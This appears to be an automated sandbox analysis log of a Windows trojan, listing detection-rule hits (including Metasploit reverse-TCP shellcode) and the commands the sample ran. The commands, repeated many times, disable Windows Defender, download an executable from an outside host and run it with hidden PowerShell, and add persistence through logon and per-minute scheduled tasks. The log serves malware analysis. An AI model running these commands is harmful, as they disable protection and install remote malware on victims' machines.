                                  Source: 0000001C.00000002.2895627672.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exe, type: DROPPEDMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
                                  Source: reddit.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: classification engineClassification label: mal100.troj.evad.winEXE@102/44@1/2
                                  Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\HiddenScriptsJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1028:120:WilError_03
                                  Source: C:\Users\user\Desktop\WO.exeFile created: C:\Users\user\AppData\Local\Temp\4782.tmpJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe"
                                  Source: C:\Users\user\Desktop\WO.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: WO.exeReversingLabs: Detection: 57%
                                  Source: unknownProcess created: C:\Users\user\Desktop\WO.exe "C:\Users\user\Desktop\WO.exe"
                                  Source: C:\Users\user\Desktop\WO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\reddit.exe "C:\Users\user\AppData\Local\Temp\reddit.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "RunRedditLogon" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc onlogon /rl highest /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditMinute"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "RunRedditMinute" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc minute /mo 1 /rl highest /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc config WinDefend start= disabled
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net stop WinDefend
                                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 stop WinDefend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6F6D.tmp\6F7E.tmp\6F7F.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7038.tmp\7039.tmp\703A.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\reddit.exe "C:\Users\user\AppData\Local\Temp\reddit.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\reddit.exe "C:\Users\user\AppData\Local\Temp\reddit.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditMinute"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditMinute"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc config WinDefend start= disabled
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc config WinDefend start= disabled
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net stop WinDefend
                                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 stop WinDefend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net stop WinDefend
                                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 stop WinDefend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\481A.tmp\481B.tmp\481C.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\reddit.exe "C:\Users\user\AppData\Local\Temp\reddit.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditMinute"
                                  Source: C:\Users\user\Desktop\WO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4782.tmp\4783.tmp\4784.bat C:\Users\user\Desktop\WO.exe"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\reddit.exe "C:\Users\user\AppData\Local\Temp\reddit.exe" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "RunRedditLogon" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc onlogon /rl highest /fJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditMinute" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "RunRedditMinute" /tr "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe" /sc minute /mo 1 /rl highest /fJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc config WinDefend start= disabledJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net stop WinDefendJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /fJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /fJump to behavior
                                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 stop WinDefendJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\6F6D.tmp\6F7E.tmp\6F7F.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\7038.tmp\7039.tmp\703A.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\reddit.exe "C:\Users\user\AppData\Local\Temp\reddit.exe" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditMinute" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc config WinDefend start= disabledJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net stop WinDefendJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /fJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /fJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\reddit.exe "C:\Users\user\AppData\Local\Temp\reddit.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditMinute"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net stop WinDefend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 stop WinDefend
                                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 stop WinDefend
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\481A.tmp\481B.tmp\481C.bat C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\user\AppData\Local\Temp\reddit.exe')"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\reddit.exe "C:\Users\user\AppData\Local\Temp\reddit.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -h "C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditLogon"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /query /TN "RunRedditMinute"
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\Desktop\WO.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
